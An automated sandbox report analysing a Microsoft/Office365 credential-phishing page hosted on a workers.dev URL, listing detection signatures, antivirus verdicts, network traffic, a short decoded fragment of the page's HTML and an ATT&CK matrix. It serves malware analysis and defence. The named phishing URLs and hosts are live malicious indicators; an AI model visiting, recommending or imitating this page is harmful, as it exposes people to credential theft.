Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://portal.bakfar.workers.dev/

Overview

General Information

Sample URL:https://portal.bakfar.workers.dev/
Analysis ID:1417323
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Detected hidden input values containing email addresses (often used in phishing pages)
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 4632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1756,i,15801424558716426216,5039533989991988249,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://portal.bakfar.workers.dev/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://portal.bakfar.workers.dev/Avira URL Cloud: detection malicious, Label: phishing
    Source: https://portal.bakfar.workers.dev/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
    Source: https://app.forexliteoptions.com/core/database/xero/css/hover.cssAvira URL Cloud: Label: phishing
    Source: https://portal.bakfar.workers.dev/favicon.icoAvira URL Cloud: Label: phishing

    Phishing

    barindex
    Source: Yara matchFile source: 0.0.pages.csv, type: HTML
    Source: https://portal.bakfar.workers.dev/Matcher: Found strong image similarity, brand: MICROSOFT
    Source: https://portal.bakfar.workers.dev/Matcher: Template: microsoft matched
    Source: https://portal.bakfar.workers.dev/HTTP Parser: info@dell.com
    Source: https://portal.bakfar.workers.dev/HTTP Parser: Number of links: 0
    Source: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1594824447%26rver%3d7.0.6737.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fnlp%253d1%2526RpsCsrfState%253d096991c0-c96c-6a4e-6fe9-e91b0da948f1%26id%3d292841%26aadredir%3d1%26CBCXT%3dout%26lw%3d1%26fl%3ddob%252cflname%252cwld%26cobrandid%3d90015%26contextid%3d2C688CEDDDA7EE22%26bk%3d1594880420&id=292841&uiflavor=web&cobrandid=90015&uaid=657745d4db72409899b7bb19b09796de&mkt=EN-GB&lc=2057&bk=1594880420#HTTP Parser: Number of links: 0
    Source: https://portal.bakfar.workers.dev/HTTP Parser: Base64 decoded: <HTML lang=en><HEAD><TITLE>Office365</TITLE><SCRIPT src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></SCRIPT><SCRIPT src="https://code.jquery.com/jquery-3.1.1.min.js"> <script src="https://code.jquery.com/jquery-3.3.1.js" in...
    Source: https://portal.bakfar.workers.dev/HTTP Parser: Title: Office365 does not match URL
    Source: https://portal.bakfar.workers.dev/HTTP Parser: <input type="password" .../> found
    Source: https://portal.bakfar.workers.dev/HTTP Parser: No favicon
    Source: https://portal.bakfar.workers.dev/HTTP Parser: No <meta name="author".. found
    Source: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1594824447%26rver%3d7.0.6737.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fnlp%253d1%2526RpsCsrfState%253d096991c0-c96c-6a4e-6fe9-e91b0da948f1%26id%3d292841%26aadredir%3d1%26CBCXT%3dout%26lw%3d1%26fl%3ddob%252cflname%252cwld%26cobrandid%3d90015%26contextid%3d2C688CEDDDA7EE22%26bk%3d1594880420&id=292841&uiflavor=web&cobrandid=90015&uaid=657745d4db72409899b7bb19b09796de&mkt=EN-GB&lc=2057&bk=1594880420#HTTP Parser: No <meta name="author".. found
    Source: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1594824447%26rver%3d7.0.6737.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fnlp%253d1%2526RpsCsrfState%253d096991c0-c96c-6a4e-6fe9-e91b0da948f1%26id%3d292841%26aadredir%3d1%26CBCXT%3dout%26lw%3d1%26fl%3ddob%252cflname%252cwld%26cobrandid%3d90015%26contextid%3d2C688CEDDDA7EE22%26bk%3d1594880420&id=292841&uiflavor=web&cobrandid=90015&uaid=657745d4db72409899b7bb19b09796de&mkt=EN-GB&lc=2057&bk=1594880420#HTTP Parser: No <meta name="author".. found
    Source: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1594824447%26rver%3d7.0.6737.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fnlp%253d1%2526RpsCsrfState%253d096991c0-c96c-6a4e-6fe9-e91b0da948f1%26id%3d292841%26aadredir%3d1%26CBCXT%3dout%26lw%3d1%26fl%3ddob%252cflname%252cwld%26cobrandid%3d90015%26contextid%3d2C688CEDDDA7EE22%26bk%3d1594880420&id=292841&uiflavor=web&cobrandid=90015&uaid=657745d4db72409899b7bb19b09796de&mkt=EN-GB&lc=2057&bk=1594880420#HTTP Parser: No <meta name="author".. found
    Source: https://portal.bakfar.workers.dev/HTTP Parser: No <meta name="copyright".. found
    Source: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1594824447%26rver%3d7.0.6737.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fnlp%253d1%2526RpsCsrfState%253d096991c0-c96c-6a4e-6fe9-e91b0da948f1%26id%3d292841%26aadredir%3d1%26CBCXT%3dout%26lw%3d1%26fl%3ddob%252cflname%252cwld%26cobrandid%3d90015%26contextid%3d2C688CEDDDA7EE22%26bk%3d1594880420&id=292841&uiflavor=web&cobrandid=90015&uaid=657745d4db72409899b7bb19b09796de&mkt=EN-GB&lc=2057&bk=1594880420#HTTP Parser: No <meta name="copyright".. found
    Source: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1594824447%26rver%3d7.0.6737.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fnlp%253d1%2526RpsCsrfState%253d096991c0-c96c-6a4e-6fe9-e91b0da948f1%26id%3d292841%26aadredir%3d1%26CBCXT%3dout%26lw%3d1%26fl%3ddob%252cflname%252cwld%26cobrandid%3d90015%26contextid%3d2C688CEDDDA7EE22%26bk%3d1594880420&id=292841&uiflavor=web&cobrandid=90015&uaid=657745d4db72409899b7bb19b09796de&mkt=EN-GB&lc=2057&bk=1594880420#HTTP Parser: No <meta name="copyright".. found
    Source: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1594824447%26rver%3d7.0.6737.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fnlp%253d1%2526RpsCsrfState%253d096991c0-c96c-6a4e-6fe9-e91b0da948f1%26id%3d292841%26aadredir%3d1%26CBCXT%3dout%26lw%3d1%26fl%3ddob%252cflname%252cwld%26cobrandid%3d90015%26contextid%3d2C688CEDDDA7EE22%26bk%3d1594880420&id=292841&uiflavor=web&cobrandid=90015&uaid=657745d4db72409899b7bb19b09796de&mkt=EN-GB&lc=2057&bk=1594880420#HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49758 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49764 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
    Source: unknownTCP traffic detected without corresponding DNS query: 162.222.105.35
    Source: unknownTCP traffic detected without corresponding DNS query: 162.222.105.35
    Source: unknownTCP traffic detected without corresponding DNS query: 23.53.126.74
    Source: unknownTCP traffic detected without corresponding DNS query: 23.53.126.74
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: portal.bakfar.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://portal.bakfar.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://portal.bakfar.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://portal.bakfar.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://portal.bakfar.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://portal.bakfar.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://portal.bakfar.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://portal.bakfar.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://portal.bakfar.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://portal.bakfar.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://portal.bakfar.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /core/database/xero/css/hover.css HTTP/1.1Host: app.forexliteoptions.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://portal.bakfar.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /214d89a26f0ac918a09f216a1b0f97b4.png HTTP/1.1Host: i.gyazo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://portal.bakfar.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: portal.bakfar.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://portal.bakfar.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /214d89a26f0ac918a09f216a1b0f97b4.png HTTP/1.1Host: i.gyazo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Gyazo_cfwoker=i
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: portal.bakfar.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /images/favicon.ico?v=2 HTTP/1.1Host: acctcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://account.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: unknownDNS traffic detected: queries for: portal.bakfar.workers.dev
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidateconnection: closecontent-length: 9date: Thu, 28 Mar 2024 23:21:03 GMTserver: Cowboyset-cookie: sid=d8e87b72-ed59-11ee-9d96-dc41a6762102; path=/; domain=.forexliteoptions.com; expires=Wed, 16 Apr 2092 02:35:11 GMT; max-age=2147483647; secure; HttpOnly
    Source: chromecache_90.2.drString found in binary or memory: http://opensource.org/licenses/MIT).
    Source: chromecache_80.2.dr, chromecache_93.2.dr, chromecache_86.2.dr, chromecache_79.2.dr, chromecache_78.2.dr, chromecache_81.2.drString found in binary or memory: https://fontawesome.com
    Source: chromecache_80.2.dr, chromecache_93.2.dr, chromecache_86.2.dr, chromecache_79.2.dr, chromecache_78.2.dr, chromecache_81.2.drString found in binary or memory: https://fontawesome.com/license/free
    Source: chromecache_97.2.drString found in binary or memory: https://fonts.gstatic.com/s/yellowtail/v22/OZpGg_pnoDtINPfRIlLohlvHwQ.woff2)
    Source: chromecache_84.2.dr, chromecache_95.2.drString found in binary or memory: https://getbootstrap.com)
    Source: chromecache_77.2.drString found in binary or memory: https://getbootstrap.com/)
    Source: chromecache_84.2.dr, chromecache_95.2.dr, chromecache_77.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
    Source: chromecache_84.2.dr, chromecache_77.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
    Source: chromecache_71.2.drString found in binary or memory: https://ka-f.fontawesome.com
    Source: chromecache_71.2.drString found in binary or memory: https://kit.fontawesome.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49758 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.4:49764 version: TLS 1.2
    Source: classification engineClassification label: mal72.phis.win@17/60@32/14
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1756,i,15801424558716426216,5039533989991988249,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://portal.bakfar.workers.dev/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1756,i,15801424558716426216,5039533989991988249,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
